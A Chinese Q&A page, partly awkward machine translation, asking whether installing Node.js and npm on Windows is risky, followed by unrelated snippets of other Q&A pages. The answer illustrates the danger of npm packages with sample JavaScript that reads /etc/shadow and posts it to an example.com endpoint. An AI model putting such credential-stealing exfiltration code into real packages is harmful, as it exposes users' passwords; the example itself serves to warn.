在Windows下安装Node.js有任何安全隐患吗?
这就是我问的原因:
为了在windows下使用lessc编译器,我必须安装Node。js和NPM基于本指南:http://lesscss.org/#getting-开始
所以基本上,我只是:
- 从http://nodejs.org/下载安装了Node.js
- 使用
npm安装-g less运行并安装
详细问题:
我是否应该注意到任何安全隐患?没有节点。有没有打开端口?它在后台运行吗?它会自动更新吗?
共有1个答案
我是否应该注意到任何安全隐患?
是的,当然,正如在评论中已经指出的那样,风险将是您运行的脚本不安全或执行任何您不想要的操作。
在上面的示例中,安装less时使用-g(全局)标志,这意味着在系统上以超级用户(管理员)身份安装less。正如@Explosion\u Pills在这里所解释的:“安装可以运行任意脚本,使用sudo运行它可能非常危险!”
AFAIK每个人都可以在npm上发布一个节点模块,所以我可以发布一个模块,你可以安装它,例如包含:
var request = require('request'),
fs = require('fs');
fs.readFile('/etc/shadow', 'utf8', function (err,data) {
if (err) {
return console.log(err);
}
request.post(
'http://www.example.com/passwords',
{ form: { key: 'value' } },
function (error, response, body) {
if (!error && response.statusCode == 200) {
console.log(body);
}
}
);
});
还要看一看节点安全项目。
-
Windows 下安装 首先下载 context-setup-mswin 和 ruby 安装 ruby ;解压 context-setup-mswin ,运行 first-setup.bat[69] 假设 conTeXt 安装在 D:\context 目录下,设置环境变量[70],在 PATH 项中添加路径: ;D:\context\tex\texmf-mswin\bin 将以下内容保存为
-
DaoCloud 通过在 GitHub 等第三方代码托管平台进行 OAuth 认证,将一个 WebHook 加入到你需要通过 DaoCloud 进行构建的代码库中。当您每次对该代码库进行修改操作时(如 Push、Pull Request 等),GitHub 等平台便会向 DaoCloud 发出通知。DaoCloud 收到来自代码托管平台的通知后,便会根据您在代码库中定义的 DaoCloud 持续集
-
问题内容: 我在尝试在Windows 10上安装Node时遇到了一些问题,并找到了解决方案。 错误如下: C:\ Users \ Stephan> npm 错误:ENOENT,状态为“ C:\ Users \ Stephan \ AppData \ Roaming \ npm” 解决方案如下。 问题答案: 原始答案: 请严格按照以下步骤操作: http://nodejs.org/download/
-
本文向大家介绍iOS开发中多线程的安全隐患总结,包括了iOS开发中多线程的安全隐患总结的使用技巧和注意事项,需要的朋友参考一下 资源共享 1块资源可能会被多个线程共享,也就是多个线程可能会访问同一块资源 比如多个线程访问同一个对象、同一个变量、同一个文件 当多个线程访问同一块资源时,很容易引发数据错乱和数据安全问题 一、解决方案 解决方案:使用线程同步技术(同步,就是协同步调,按预定的先后次序进行
-
问题内容: 我最近不得不设置为,以便能够进行跨子域的ajax调用。 现在,我不禁感到自己正在使环境面临安全风险。 如果我做错了,请帮助我。 问题答案: 通过使用响应,所请求的资源允许与每个来源共享。基本上,这意味着任何站点都可以向您的站点发送XHR请求并访问服务器的响应,如果您尚未实现此CORS响应,则不会这样。 因此,任何站点都可以代表其访问者向您的站点发出请求并处理其响应。如果您基于浏览器自动
-
windows10 下面安装wsl --install 我平常用惯了了centos 但是这里好像没有 应该怎么处理呢 打开docker desktop 我想使用dockerdesktop 我查看我的w10版本是符合的